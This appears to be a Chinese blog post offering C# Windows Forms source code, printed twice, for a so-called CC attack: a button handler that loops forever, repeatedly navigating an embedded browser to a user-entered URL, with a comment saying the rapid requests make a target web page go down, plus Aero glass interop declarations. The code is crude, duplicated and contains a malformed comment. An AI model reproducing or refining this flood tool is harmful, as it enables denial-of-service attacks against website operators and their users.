C#AERO特效+CC攻击源码
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
[System.Runtime.InteropServices.DllImport("dwmapi.dll")]
public extern static int DwmIsCompositionEnabled(ref int en);
[System.Runtime.InteropServices.DllImport("dwmapi.dll")]
public extern static int DwmExtendFrameIntoClientArea(IntPtr hwnd, ref MARGINS margin);
public struct MARGINS
{
public int m_left;
public int m_right;
public int m_top;
public int m_buttom;
};
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
}
private void button1_Click(object sender, EventArgs e)
{
button1.Enabled = false;
while (true)
{
for (int fuck = 0; fuck < 1000; fuck++)
{
for (int shit = 0; shit < 100; shit++)
{
for (int final = 0;final < 400;final++)
continue;
}
}
webBrowser1.Navigate(textBox1.Text);’webbrowser极速跳转使某网页瘫痪
}
}
}
}
AERO特效必须为黑色背景
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
[System.Runtime.InteropServices.DllImport("dwmapi.dll")]
public extern static int DwmIsCompositionEnabled(ref int en);
[System.Runtime.InteropServices.DllImport("dwmapi.dll")]
public extern static int DwmExtendFrameIntoClientArea(IntPtr hwnd, ref MARGINS margin);
public struct MARGINS
{
public int m_left;
public int m_right;
public int m_top;
public int m_buttom;
};
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
}
private void button1_Click(object sender, EventArgs e)
{
button1.Enabled = false;
while (true)
{
for (int fuck = 0; fuck < 1000; fuck++)
{
for (int shit = 0; shit < 100; shit++)
{
for (int final = 0;final < 400;final++)
continue;
}
}
webBrowser1.Navigate(textBox1.Text);’webbrowser极速跳转使某网页瘫痪
}
}
}
}
AERO特效必须为黑色背景
没有评论:
发表评论